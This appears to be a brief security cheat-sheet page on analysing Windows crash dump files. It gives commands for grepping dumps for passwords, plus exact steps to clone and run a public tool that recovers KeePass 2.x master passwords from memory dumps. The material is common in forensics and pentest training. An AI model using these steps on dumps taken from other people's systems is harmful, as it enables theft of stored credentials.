Windows Memory Dump Analysis
A memory dump file (.dmp), also called as 'crash dump' is a crash report file.
file example.dmp
# Output
example.dmp: Mini DuMP crash report, 18 streams, Sat Nov ...
Copied!We can also read contents of this file by usual static analysis such as below.
strings example.dmp
strings example.dmp | grep -i password
# Open pager
strings example.dmp | less
xxd example.dmp
Copied!IDA, ILSpy
Visual Studio
This file can also be read with online DMP viewer.
If the .dmp file contains KeePass memory, we might be able to dump the master key. This vulnerability exists in KeePass 2.x before 2.54. keepass-password-dumpter is useful to do that.
In Windows, run the follwoing command.
git clone https://github.com/vdohney/keepass-password-dumper.git
cd keepass-password-dumper
dotnet run example.dmpLast updated